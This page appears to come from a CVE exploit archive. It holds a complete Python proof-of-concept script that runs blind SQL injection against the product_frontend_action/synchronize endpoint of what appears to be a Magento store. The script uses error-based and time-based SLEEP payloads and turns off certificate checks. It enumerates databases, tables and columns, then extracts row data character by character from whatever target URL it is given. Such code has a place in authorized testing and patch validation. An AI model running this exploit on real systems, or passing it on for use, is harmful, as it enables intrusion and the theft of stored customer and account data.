4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3

import requests
import string
import binascii
import sys
import time

requests.packages.urllib3.disable_warnings()

class ExploitError(Exception):
    pass

class Browser:
    PROXY = None

    def __init__(self, url):
        self.url = url.rstrip('/')
        self.s = requests.Session()
        self.s.verify = False
        if self.PROXY:
            self.s.proxies = {'http': self.PROXY, 'https': self.PROXY}

class SQLInjection(Browser):
    def encode(self, s: str) -> str:
        return '0x' + binascii.b2a_hex(s.encode()).decode()

    def find_test_method(self):
        for m in (self.test_error, self.test_timebased):
            if m('123=123') and not m('123=124'):
                self.test = m
                return
        raise ExploitError('No reliable injection test method found')

    def test_error(self, condition: str) -> bool:
        payload = f"))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE {condition}) -- -"
        r = self.s.get(
            f"{self.url}/catalog/product_frontend_action/synchronize",
            params={
                'type_id': 'recently_products',
                'ids[0][added_at]': '',
                'ids[0][product_id][from]': '?',
                'ids[0][product_id][to]': payload
            }
        )
        return r.status_code == 400

    def test_timebased(self, condition: str) -> bool:
        payload = f"))) OR (SELECT*FROM (SELECT SLEEP(IF({condition},2,0)))a) -- -"
        start = time.time()
        self.s.get(
            f"{self.url}/catalog/product_frontend_action/synchronize",
            params={
                'type_id': 'recently_products',
                'ids[0][added_at]': '',
                'ids[0][product_id][from]': '?',
                'ids[0][product_id][to]': payload
            }
        )
        return (time.time() - start) > 1.5

    def get_length(self, label: str, expr: str) -> int:
        for i in range(1, 100):
            condition = f"LENGTH({expr})={i}"
            if self.test(condition):
                print(f"[+] {label} length = {i}")
                return i
        raise ExploitError(f"Failed to determine length of {label}")

    def word(self, label: str, sql_expr: str, size: int = None, charset: str = None) -> str:
        if charset is None:
            charset = string.ascii_letters + string.digits + '_-:.@#$%&*()'

        if size is None:
            try:
                size = self.get_length(label, sql_expr)
            except ExploitError:
                print(f"[!] Skipping {label}, unable to determine length")
                return ''

        result = ''
        for pos in range(1, size + 1):
            found = False
            for c in charset:
                condition = f"ASCII(SUBSTRING(({sql_expr}),{pos},1))={ord(c)}"
                if self.test(condition):
                    result += c
                    print(f"{label} => {result}", end='\r')
                    found = True
                    break
            if not found:
                result += '?'
                print(f"[!] Failed to resolve char at pos {pos} for {label}")
        print()
        return result

    def get_current_db(self):
        return self.word("Current DB", "DATABASE()")

    def get_databases(self, limit=10, current_first=True):
        dbs = []
        current = self.get_current_db() if current_first else None
        for i in range(limit):
            expr = f"(SELECT schema_name FROM information_schema.schemata LIMIT {i},1)"
            db = self.word(f"DB#{i+1}", expr)
            if db and db != current:
                dbs.append(db)
        return [current] + dbs if current else dbs

    def get_tables(self, db: str, limit: int = 10) -> list:
        tables = []
        for i in range(limit):
            expr = f"(SELECT table_name FROM information_schema.tables WHERE table_schema={self.encode(db)} LIMIT {i},1)"
            tbl = self.word(f"Table#{i+1}", expr)
            if tbl:
                tables.append(tbl)
        return tables

    def get_columns(self, db: str, table: str, limit: int = 10) -> list:
        cols = []
        for i in range(limit):
            expr = f"(SELECT column_name FROM information_schema.columns WHERE table_schema={self.encode(db)} AND table_name={self.encode(table)} LIMIT {i},1)"
            col = self.word(f"Col#{i+1}", expr)
            if col:
                cols.append(col)
        return cols

    def get_data(self, db: str, table: str, column: str, limit: int = 5) -> list:
        rows = []
        for i in range(limit):
            expr = f"(SELECT {column} FROM {db}.{table} LIMIT {i},1)"
            try:
                val = self.word(f"{column}@{i}", expr, charset=string.printable.replace('%','').replace("'", ""))
                if val:
                    rows.append(val)
            except ExploitError as e:
                print(f"[!] Skipping row {i} due to error: {e}")
                continue
        return rows

def run(url):
    sqli = SQLInjection(url)
    try:
        sqli.find_test_method()
        print("[+] Injection test method detected!")

        dbs = sqli.get_databases(limit=10)
        print(f"[+] Databases: {dbs}\n")

        for db in dbs:
            print(f"[>] Enumerating DB: {db}")
            tables = sqli.get_tables(db)
            print(f"[+] Tables: {tables}")

            for table in tables:
                cols = sqli.get_columns(db, table)
                print(f"[+] Columns in {table}: {cols}")

                for col in cols:
                    data = sqli.get_data(db, table, col)
                    print(f"[+] Sample data from {table}.{col}: {data}")

    except ExploitError as e:
        print(f"Error: {e}")

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        sys.exit(1)
    run(sys.argv[1])